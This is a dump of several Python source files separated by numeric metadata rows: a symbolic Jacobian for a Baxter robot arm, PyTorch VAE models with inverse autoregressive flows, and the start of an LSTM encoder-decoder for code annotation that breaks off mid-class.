math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)))*(L4*(math.sin(t2)*math.sin(t4) - math.cos(t2)*math.cos(t3)*math.cos(t4)) - math.cos(t3)*(L1 + L2*math.cos(t2)) + L3*math.sin(t2) + L5*math.cos(t5)*(math.cos(t4)*math.sin(t2) + math.cos(t2)*math.cos(t3)*math.sin(t4))), (math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) + math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) + math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)))*(math.cos(t3)*(L4 + L2*math.cos(t4) + L3*math.sin(t4)) - L5*math.sin(t3)*math.sin(t4)*math.sin(t5)) - (math.sin(t4)*(math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) + math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) - math.cos(t2)*math.cos(t4)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)))*(math.cos(t3)*(L3*math.cos(t4) + L5*math.cos(t5) - L2*math.sin(t4)) - L5*math.cos(t4)*math.sin(t3)*math.sin(t5)) - math.sin(t3)*(math.cos(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) - math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)))*(L2 + L4*math.cos(t4) - L5*math.cos(t5)*math.sin(t4)), (math.cos(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) - math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)))*(L3 + L4*math.sin(t4) + L5*math.cos(t4)*math.cos(t5)) - L5*math.cos(t4)*math.sin(t5)*(math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) + math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) + math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) - L5*math.sin(t4)*math.sin(t5)*(math.sin(t4)*(math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) + math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) - math.cos(t2)*math.cos(t4)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))), L4*(math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) + math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) + math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) - L5*math.cos(t5)*(math.sin(t4)*(math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) + math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) - math.cos(t2)*math.cos(t4)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))), L5*math.cos(t5)*(math.cos(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) - math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) - L5*math.sin(t5)*(math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) + math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) + math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) 
- 0.7071*math.sin(t1))), 0, 0],
[ (math.cos(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) + math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)))*(L4*(math.sin(t2)*math.sin(t4) - math.cos(t2)*math.cos(t3)*math.cos(t4)) - math.cos(t3)*(L1 + L2*math.cos(t2)) + L3*math.sin(t2) + L5*math.cos(t5)*(math.cos(t4)*math.sin(t2) + math.cos(t2)*math.cos(t3)*math.sin(t4))) - (math.sin(t4)*(math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) + math.cos(t2)*math.cos(t4)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)))*(math.sin(t3)*(math.sin(t4)*(L1 + L2*math.cos(t2)) - L3*math.cos(t2)*math.cos(t4)) + L5*math.sin(t5)*(math.sin(t2)*math.sin(t4) - math.cos(t2)*math.cos(t3)*math.cos(t4)) - L5*math.cos(t2)*math.cos(t5)*math.sin(t3)) - (math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) - math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)))*(math.sin(t3)*(math.cos(t4)*(L1 + L2*math.cos(t2)) + math.cos(t2)*(L4 + L3*math.sin(t4))) + L5*math.sin(t5)*(math.cos(t4)*math.sin(t2) + math.cos(t2)*math.cos(t3)*math.sin(t4))), (math.sin(t4)*(math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) + math.cos(t2)*math.cos(t4)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)))*(math.cos(t3)*(L3*math.cos(t4) + L5*math.cos(t5) - L2*math.sin(t4)) - L5*math.cos(t4)*math.sin(t3)*math.sin(t5)) - (math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) - math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)))*(math.cos(t3)*(L4 + L2*math.cos(t4) + L3*math.sin(t4)) - L5*math.sin(t3)*math.sin(t4)*math.sin(t5)) + math.sin(t3)*(math.cos(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) + math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)))*(L2 + L4*math.cos(t4) - L5*math.cos(t5)*math.sin(t4)), L5*math.cos(t4)*math.sin(t5)*(math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) - math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) - (math.cos(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) + math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)))*(L3 + L4*math.sin(t4) + L5*math.cos(t4)*math.cos(t5)) + L5*math.sin(t4)*math.sin(t5)*(math.sin(t4)*(math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) + math.cos(t2)*math.cos(t4)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))), L5*math.cos(t5)*(math.sin(t4)*(math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) + math.cos(t2)*math.cos(t4)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) - L4*(math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) - math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))), L5*math.sin(t5)*(math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) - math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) - L5*math.cos(t5)*(math.cos(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) + math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) + 
0.7071*math.sin(t1))), 0, 0],
[ 0, (math.sin(t2)*math.sin(t4) - math.cos(t2)*math.cos(t3)*math.cos(t4))*(math.cos(t3)*(L4 + L2*math.cos(t4) + L3*math.sin(t4)) - L5*math.sin(t3)*math.sin(t4)*math.sin(t5)) + (math.cos(t4)*math.sin(t2) + math.cos(t2)*math.cos(t3)*math.sin(t4))*(math.cos(t3)*(L3*math.cos(t4) + L5*math.cos(t5) - L2*math.sin(t4)) - L5*math.cos(t4)*math.sin(t3)*math.sin(t5)) - math.cos(t2)*math.sin(t3)**2*(L2 + L4*math.cos(t4) - L5*math.cos(t5)*math.sin(t4)), math.cos(t2)*(L3*math.sin(t3) + L5*math.cos(t3)*math.sin(t5) + L4*math.sin(t3)*math.sin(t4) + L5*math.cos(t4)*math.cos(t5)*math.sin(t3)), L4*(math.sin(t2)*math.sin(t4) - math.cos(t2)*math.cos(t3)*math.cos(t4)) + L5*math.cos(t5)*(math.cos(t4)*math.sin(t2) + math.cos(t2)*math.cos(t3)*math.sin(t4)), L5*math.cos(t2)*math.cos(t5)*math.sin(t3) - L5*math.sin(t5)*(math.sin(t2)*math.sin(t4) - math.cos(t2)*math.cos(t3)*math.cos(t4)), 0, 0],
[ (math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) + math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) + math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)))*(math.sin(t2)*math.sin(t4) - math.cos(t2)*math.cos(t3)*math.cos(t4)) - (math.sin(t4)*(math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) + math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) - math.cos(t2)*math.cos(t4)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)))*(math.sin(t2)*math.sin(t4) + math.cos(t2)*math.cos(t3)*math.cos(t4)) + math.cos(t2)*math.sin(t3)*(math.cos(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) - math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))), math.sin(t1 + 0.7854), -math.cos(t1 + 0.7854)*math.cos(t2), math.cos(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) - math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)), math.sin(t4)*(math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) + math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) - math.cos(t2)*math.cos(t4)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)), math.cos(t5)*(math.cos(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) - math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) - math.sin(t5)*(math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) + math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) + math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))), math.cos(t6)*(math.sin(t4)*(math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) + math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) - math.cos(t2)*math.cos(t4)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) + math.sin(t5)*math.sin(t6)*(math.cos(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) - math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) + math.cos(t5)*math.sin(t6)*(math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)) + math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1))) + math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)))],
[ (math.sin(t4)*(math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) + math.cos(t2)*math.cos(t4)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)))*(math.sin(t2)*math.sin(t4) + math.cos(t2)*math.cos(t3)*math.cos(t4)) - (math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) - math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)))*(math.sin(t2)*math.sin(t4) - math.cos(t2)*math.cos(t3)*math.cos(t4)) - math.cos(t2)*math.sin(t3)*(math.cos(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) + math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))), -math.cos(t1 + 0.7854), -math.sin(t1 + 0.7854)*math.cos(t2), - math.cos(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)), - math.sin(t4)*(math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) - math.cos(t2)*math.cos(t4)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)), math.sin(t5)*(math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) - math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) - math.cos(t5)*(math.cos(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) + math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))), - math.cos(t6)*(math.sin(t4)*(math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) + math.cos(t2)*math.cos(t4)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) - math.sin(t5)*math.sin(t6)*(math.cos(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) + math.sin(t2)*math.sin(t3)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) - math.cos(t5)*math.sin(t6)*(math.cos(t4)*(math.sin(t3)*(0.7071*math.cos(t1) - 0.7071*math.sin(t1)) - math.cos(t3)*math.sin(t2)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1))) - math.cos(t2)*math.sin(t4)*(0.7071*math.cos(t1) + 0.7071*math.sin(t1)))],
[ (math.cos(t4)*math.sin(t2) + math.cos(t2)*math.cos(t3)*math.sin(t4))*(math.sin(t2)*math.sin(t4) + math.cos(t2)*math.cos(t3)*math.cos(t4)) + (math.sin(t2)*math.sin(t4) - math.cos(t2)*math.cos(t3)*math.cos(t4))**2 + math.cos(t2)**2*math.sin(t3)**2, 0, -math.sin(t2), math.cos(t2)*math.sin(t3), - math.cos(t4)*math.sin(t2) - math.cos(t2)*math.cos(t3)*math.sin(t4), math.cos(t2)*math.cos(t5)*math.sin(t3) - math.sin(t5)*(math.sin(t2)*math.sin(t4) - math.cos(t2)*math.cos(t3)*math.cos(t4)), math.cos(t5)*math.sin(t6)*(math.sin(t2)*math.sin(t4) - math.cos(t2)*math.cos(t3)*math.cos(t4)) - math.cos(t6)*(math.cos(t4)*math.sin(t2) + math.cos(t2)*math.cos(t3)*math.sin(t4)) + math.cos(t2)*math.sin(t3)*math.sin(t5)*math.sin(t6)]])
# bj = BaxterJacobian(bc.BaxterClass().baxter_distances, [0, 0, 0, 0, 0, 0, 0], "left")
# print(bj.calculate_jacobian())
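# A minimal usage sketch; the BaxterClass import path below is an assumption, and the
# 6x7 shape is inferred from the expression above (6 rows, 7 joint columns):
#
#   from baxter_essentials.baxter_class import BaxterClass   # hypothetical module path
#   joint_values = [0.1, -0.2, 0.0, 0.5, 0.0, 0.3, 0.0]      # s0, s1, e0, e1, w0, w1, w2
#   bj = BaxterJacobian(BaxterClass().baxter_distances, joint_values, "right")
#   J = bj.calculate_jacobian()   # note: limb="left" currently returns a placeholder string
#   print(J.shape)                # expected (6, 7)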
| 416.844828
| 3,902
| 0.382181
| 3,071
| 24,177
| 2.993813
| 0.029306
| 0.291603
| 0.238851
| 0.134871
| 0.8933
| 0.890907
| 0.885578
| 0.881879
| 0.875897
| 0.875897
| 0
| 0.157654
| 0.440129
| 24,177
| 57
| 3,903
| 424.157895
| 0.521572
| 0.029119
| 0
| 0
| 0
| 0
| 0.001238
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074074
| false
| 0
| 0.074074
| 0
| 0.259259
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
6fb95af500ac2115f3b94cb0e61e6909cff1a983
| 5,553
|
py
|
Python
|
models/DIF_net.py
|
MrHuff/DIF-NLDL
|
4d032cb0522efd62ea754a6c5d02b7015ef2f62b
|
[
"MIT"
] | null | null | null |
models/DIF_net.py
|
MrHuff/DIF-NLDL
|
4d032cb0522efd62ea754a6c5d02b7015ef2f62b
|
[
"MIT"
] | null | null | null |
models/DIF_net.py
|
MrHuff/DIF-NLDL
|
4d032cb0522efd62ea754a6c5d02b7015ef2f62b
|
[
"MIT"
] | null | null | null |
from models.networks import IntroVAE
from IAF.IAF import IAF_flow
import torch
from models.networks_v2 import *
from IAF.layers.utils import accumulate_kl_div, reset_kl_div
class DIF_net(IntroVAE):
def __init__(self,cdim=3,
hdim=512,
channels=[64, 128, 256, 512, 512, 512],
image_size=256,
flow_depth = 3,
flow_C=100,
tanh_flag=True):
super(DIF_net, self).__init__(cdim=cdim, hdim=hdim, channels=channels, image_size=image_size)
self.tanh_flag=tanh_flag
self.C = flow_C
def reparameterize(self, mu, logvar):
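# Standard VAE reparameterisation: z = mu + eps * std with eps ~ N(0, I). When tanh_flag
# is set, the sample is soft-clamped to (-C, C) via C * tanh(z / C), which is close to the
# identity for |z| << C but bounds extreme latents.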
std = logvar.mul(0.5).exp_()
eps = torch.randn_like(std)
z = eps.mul(std).add_(mu)
if self.tanh_flag:
return self.C*torch.tanh(z/self.C)
else:
return z
def sample(self,z):
if self.tanh_flag:
return self.decode(self.C * torch.tanh(z / self.C))
else:
return self.decode(z)
def sample_fake_eval(self,n):
z = torch.randn(n,self.hdim).cuda()
return self.sample(z)
def get_latent(self,x):
mu, logvar = self.encode(x)
z = self.reparameterize(mu, logvar)
return z
class DIF_net_flow(IntroVAE):
def __init__(self,cdim=3,
hdim=512,
channels=[64, 128, 256, 512, 512, 512],
image_size=256,
flow_depth = 3,
flow_C=100,
tanh_flag=True):
super(DIF_net_flow, self).__init__(cdim=cdim, hdim=hdim, channels=channels, image_size=image_size)
self.tanh_flag=tanh_flag
self.C = flow_C
self.flow = IAF_flow(hdim,flow_depth,tanh_flag,flow_C)
def forward(self, x):
mu, logvar = self.encode(x)
xi,z,flow_log_det = self.reparameterize(mu, logvar)
y = self.decode(z)
return mu, logvar, z, y, flow_log_det,xi
def reparameterize(self, mu, logvar):
std = logvar.mul(0.5).exp_()
eps = torch.randn_like(mu)
xi = eps.mul(std).add_(mu)
z,log_det = self.flow(xi,logvar)
return xi,z,log_det
def flow_forward_only(self,xi,logvar=None):
output,_ = self.flow(xi, logvar)
return output
def encode_and_flow(self,x):
mu, logvar = self.encode(x)
xi,z,flow_log_det = self.reparameterize(mu, logvar)
return mu, logvar, z, flow_log_det,xi
def get_latent(self,x):
return self.encode_and_flow(x)
def sample(self,xi,logvar):
with torch.no_grad():
z,_ = self.flow(xi,logvar)
return self.decode(z.detach())
def sample_fake_eval(self, n):
z = torch.randn(n, self.hdim).cuda()
logvar = torch.zeros_like(z)
return self.sample(z,logvar)
class DIF_netv2(IntroVAEv2):
def __init__(self,cdim=3,
hdim=512,
channels=[64, 128, 256, 512, 512, 512],
image_size=256,
flow_depth = 3,
flow_C=100,
tanh_flag=True):
super(DIF_netv2, self).__init__(cdim=cdim, hdim=hdim, channels=channels, image_size=image_size)
self.tanh_flag=tanh_flag
self.C = flow_C
def reparameterize(self, mu, logvar):
std = logvar.mul(0.5).exp_()
eps = torch.randn_like(std)
z = eps.mul(std).add_(mu)
if self.tanh_flag:
return self.C*torch.tanh(z/self.C)
else:
return z
def sample(self,z):
if self.tanh_flag:
return self.decode(self.C * torch.tanh(z / self.C))
else:
return self.decode(z)
def sample_fake_eval(self,n):
z = torch.randn(n,self.hdim).cuda()
return self.sample(z)
def get_latent(self,x):
mu, logvar = self.encode(x)
z = self.reparameterize(mu, logvar)
return z
class DIF_net_flow_v2(IntroVAEv2):
def __init__(self,cdim=3,
hdim=512,
channels=[64, 128, 256, 512, 512, 512],
image_size=256,
flow_depth = 3,
flow_C=100,
tanh_flag=True):
super(DIF_net_flow_v2, self).__init__(cdim=cdim, hdim=hdim, channels=channels, image_size=image_size)
self.tanh_flag=tanh_flag
self.C = flow_C
self.flow = IAF_flow(hdim,flow_depth,tanh_flag,flow_C)
def forward(self, x):
mu, logvar = self.encode(x)
xi,z,flow_log_det = self.reparameterize(mu, logvar)
y = self.decode(z)
return mu, logvar, z, y, flow_log_det,xi
def reparameterize(self, mu, logvar):
std = logvar.mul(0.5).exp_()
eps = torch.randn_like(mu)
xi = eps.mul(std).add_(mu)
z,log_det = self.flow(xi,logvar)
return xi,z,log_det
def flow_forward_only(self,xi,logvar=None):
output,_ = self.flow(xi, logvar)
return output
def encode_and_flow(self,x):
mu, logvar = self.encode(x)
xi,z,flow_log_det = self.reparameterize(mu, logvar)
return mu, logvar, z, flow_log_det,xi
def get_latent(self,x):
return self.encode_and_flow(x)
def sample(self,xi,logvar):
with torch.no_grad():
z,_ = self.flow(xi,logvar)
return self.decode(z.detach())
def sample_fake_eval(self, n):
z = torch.randn(n, self.hdim).cuda()
logvar = torch.zeros_like(z)
return self.sample(z,logvar)
| 30.679558
| 106
| 0.570863
| 782
| 5,553
| 3.845269
| 0.102302
| 0.053209
| 0.031926
| 0.025939
| 0.9428
| 0.9428
| 0.9428
| 0.9428
| 0.9428
| 0.9428
| 0
| 0.033062
| 0.313704
| 5,553
| 181
| 107
| 30.679558
| 0.75597
| 0
| 0
| 0.92517
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.176871
| false
| 0
| 0.034014
| 0.013605
| 0.414966
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6feb17a612343c1502c60175ffd32cedf39f7e6e
| 75
|
py
|
Python
|
agents/common/__init__.py
|
ksang/Voigt-Kampff
|
21f9ad172e5edf0fe50479eba816413f477b4c70
|
[
"MIT"
] | 3
|
2018-07-28T09:21:45.000Z
|
2020-04-11T15:01:12.000Z
|
agents/common/__init__.py
|
ksang/Voigt-Kampff
|
21f9ad172e5edf0fe50479eba816413f477b4c70
|
[
"MIT"
] | null | null | null |
agents/common/__init__.py
|
ksang/Voigt-Kampff
|
21f9ad172e5edf0fe50479eba816413f477b4c70
|
[
"MIT"
] | null | null | null |
from agents.common.model import Linear
from agents.common.model import CNN
| 25
| 38
| 0.84
| 12
| 75
| 5.25
| 0.583333
| 0.31746
| 0.507937
| 0.666667
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106667
| 75
| 2
| 39
| 37.5
| 0.940299
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
6ff57e855e36be170e538a562c47da7085f367a1
| 34,531
|
py
|
Python
|
code/code_annotation/lib/model/EncoderDecoder.py
|
sunlab-osu/CoaCor
|
e5df8fd38830590b9f132dd68bc26c630e41e509
|
[
"Apache-2.0"
] | 30
|
2019-03-08T05:11:32.000Z
|
2021-12-09T12:11:29.000Z
|
code/code_annotation/lib/model/EncoderDecoder.py
|
sunlab-osu/CoaCor
|
e5df8fd38830590b9f132dd68bc26c630e41e509
|
[
"Apache-2.0"
] | 1
|
2020-04-18T14:46:48.000Z
|
2020-06-17T20:08:37.000Z
|
code/code_annotation/lib/model/EncoderDecoder.py
|
sunlab-osu/CoaCor
|
e5df8fd38830590b9f132dd68bc26c630e41e509
|
[
"Apache-2.0"
] | 4
|
2019-07-02T05:25:11.000Z
|
2021-05-27T12:52:21.000Z
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from torch.nn.utils.rnn import pad_packed_sequence as unpack
from torch.nn.utils.rnn import pack_padded_sequence as pack
import gensim  # required by the *_W2V encoder/decoder classes below
import numpy as np
import lib
import sys
import re
import pdb
class Encoder_W2V(nn.Module):
def __init__(self, opt, dicts):
self.layers = opt.layers
self.num_directions = 2 if opt.brnn else 1
assert opt.rnn_size % self.num_directions == 0
self.hidden_size = opt.rnn_size // self.num_directions
super(Encoder_W2V, self).__init__()
# self.word_lut = nn.Embedding(dicts.size(), opt.word_vec_size, padding_idx=lib.Constants.PAD)
self.embeddings = gensim.models.Word2Vec.load(opt.embedding_w2v + 'processed_all.train_xe.code.gz')
self.rnn = nn.LSTM(opt.word_vec_size, self.hidden_size, num_layers=opt.layers, dropout=opt.dropout, bidirectional=opt.brnn)
self.dicts = dicts
self.opt = opt
def embedding(self, input):
emb = []
for i in range(input.shape[0]):
emb_row = []
for w in self.dicts.convertToLabels(input[i].tolist(), lib.Constants.UNK_WORD):
try:
emb_row.append(self.embeddings.wv[w].astype(float))
except:
emb_row.append(np.zeros((self.opt.word_vec_size), dtype=float))
emb.append(emb_row)
emb = torch.Tensor(emb)
if self.opt.gpus:
emb = emb.cuda()
# print "decoder-emb: "
# print emb
return emb
def forward(self, inputs, hidden=None):
input = inputs[0].data.cpu().numpy()
emb = self.embedding(input)
emb = pack(emb, inputs[1])
outputs, hidden_t = self.rnn(emb, hidden)
outputs = unpack(outputs)[0]
return hidden_t, outputs
class Encoder(nn.Module):
def __init__(self, opt, dicts):
self.layers = opt.layers
self.num_directions = 2 if opt.brnn else 1
assert opt.rnn_size % self.num_directions == 0
self.hidden_size = opt.rnn_size // self.num_directions
super(Encoder, self).__init__()
self.word_lut = nn.Embedding(dicts.size(), opt.word_vec_size, padding_idx=lib.Constants.PAD)
self.rnn = nn.LSTM(opt.word_vec_size, self.hidden_size, dropout=opt.dropout,
num_layers=opt.layers, bidirectional=opt.brnn)
self.dicts = dicts
self.opt = opt
def forward(self, inputs, hidden=None):
emb = pack(self.word_lut(inputs[0]), inputs[1])
outputs, hidden_t = self.rnn(emb, hidden)
outputs = unpack(outputs)[0]
return hidden_t, outputs
class StackedLSTM(nn.Module):
def __init__(self, num_layers, input_size, rnn_size, dropout):
super(StackedLSTM, self).__init__()
self.dropout = nn.Dropout(dropout)
self.num_layers = num_layers
self.layers = nn.ModuleList()
for i in range(num_layers):
self.layers.append(nn.LSTMCell(input_size, rnn_size))
input_size = rnn_size
def forward(self, inputs, hidden):
h_0, c_0 = hidden
h_1, c_1 = [], []
for i, layer in enumerate(self.layers):
h_1_i, c_1_i = layer(inputs, (h_0[i], c_0[i]))
inputs = h_1_i
if i != self.num_layers:
inputs = self.dropout(inputs)
h_1 += [h_1_i]
c_1 += [c_1_i]
h_1 = torch.stack(h_1)
c_1 = torch.stack(c_1)
return inputs, (h_1, c_1)
class BinaryTreeLeafModule(nn.Module):
def __init__(self, cuda, in_dim, mem_dim):
super(BinaryTreeLeafModule, self).__init__()
self.cudaFlag = cuda
self.in_dim = in_dim
self.mem_dim = mem_dim
self.cx = nn.Linear(self.in_dim, self.mem_dim)
self.ox = nn.Linear(self.in_dim, self.mem_dim)
if self.cudaFlag:
self.cx = self.cx.cuda()
self.ox = self.ox.cuda()
def forward(self, input):
c = self.cx(input)
o = F.sigmoid(self.ox(input))
h = o * F.tanh(c)
return h, (c, h)
class BinaryTreeComposer(nn.Module):
def __init__(self, cuda, in_dim, mem_dim, gate_output=False):
super(BinaryTreeComposer, self).__init__()
self.cudaFlag = cuda
